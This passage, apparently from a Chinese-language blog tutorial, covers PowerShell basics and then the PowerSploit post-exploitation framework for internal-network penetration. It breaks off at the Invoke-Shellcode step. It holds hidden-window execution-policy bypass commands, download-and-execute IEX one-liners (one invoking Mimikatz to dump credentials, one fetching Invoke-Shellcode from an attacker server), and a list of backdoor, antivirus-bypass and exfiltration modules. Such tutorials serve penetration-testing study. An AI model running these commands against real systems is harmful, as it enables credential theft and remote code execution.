一.Powershell
我們先來說說powershell,PowerShell 是運行在 Windows上實現系統和應用程序管理自動化的命令行腳本環境。你可以把它看成是命令行提示符 cmd.exe 的擴充,或是顛覆。Powershell需要.NET環境的支持,同時支持.NET對象。其可讀性,易用性,可以位居當前所有 shell 之首。
這是別人說的,不過稍微研究下覺得,哇塞,這東西真的挺牛的,除了語法麻煩以外,剩下都挺好,不過語法麻煩讓我們這種英文不好的人怎么玩啊

當前 PowerShell 有五個版本,分別為 1.0,2.0,3.0,4.0,5.0
當時看別人的文章都說是有四個版本,但是我打開windows10看一眼,恩,微軟更新了,windows10自帶的5.(好幾)的版本啊

先來看看他的基本命令:
新建目錄 New-Item whitecellclub -ItemType Directory
新建文件 New-Item light.txt -ItemType File
刪除目錄 Remove-Item whitecellclub
顯示文本內容 Get-Content light.txt
設置文本內容 Set-Content light.txt -Value “i love light so much”
追加內容 Add-Content light.txt -Value “but i love you more”
清除內容 Clear-Content light.txt
看看吧,什么感覺,你還喜歡他么?
不過好在,微軟也想到了這個問題,我們可以用windows下的命令跟Linux下的命令,比如:

這里說一下,我們怎么看我們powershell的版本,
Get-Host
這個是虛擬機的win7,所以是2.0的版本
powershell還有一些比較叼的用法:
本地權限繞過執行
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隱藏權限繞過執行腳本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
-NoProfile -WindowStyle Hidden(隱藏窗口) -File xxx.ps1
直接用IEX下載遠程的PS1腳本回來權限繞過執行
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-
Mimikatz -DumpCreds"
我們可以來試一下:
這個命令是可以看到我們的版本的


完美繞過!(ps:這里說一下,ps1結尾的是powershell腳本,大家可以自己去研究下,我這里就不在贅述了,因為我也不會寫這種腳本)
二. Powersploit
介紹完了,我們開始我們的正題吧 Powersploit在內網滲透中的使用
powersploit一款基于powershell的后滲透(Post-Exploitation)框架,集成大量滲透相關模塊和功能。
github地址: https://github.com/mattifestation/PowerSploit
這里才是重點,我們開始吧:
首先,我在我本機上下載這個腳本文件

ps:我本機用的是ubuntu,所以我這里就用ubuntu代替kali的操作
下載完成之后,我們把我們下載的文件放到apache目錄小,讓我們可以遠程下載,然后啟動apache
service apache2 start
然后我們訪問我們的127.0.0.1 保證我們可以訪問的到

他的目錄就跟metasploit一樣,分工明確
CodeExecution 在目標主機執行代碼
ScriptModification 在目標主機上創建或修改腳本
Persistence 后門腳本(持久性控制)
AntivirusBypass 發現殺軟查殺特征
Exfiltration 目標主機上的信息搜集工具
Mayhem 藍屏等破壞性腳本
Recon 以目標主機為跳板進行內網信息偵查
(1). Invoke-Shellcode
我們使用 Invoke-Shellcode
Invoke-Shellcode的作用:將shellcode插入您選擇的進程ID或本地PowerShell中。
Invoke-Shellcode配合上metasploit,可以達到意想不到的效果
現在主機上下載我們的腳本(當然,你也可以直接從github上去下載,也可以從我們本機下載)
IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")
|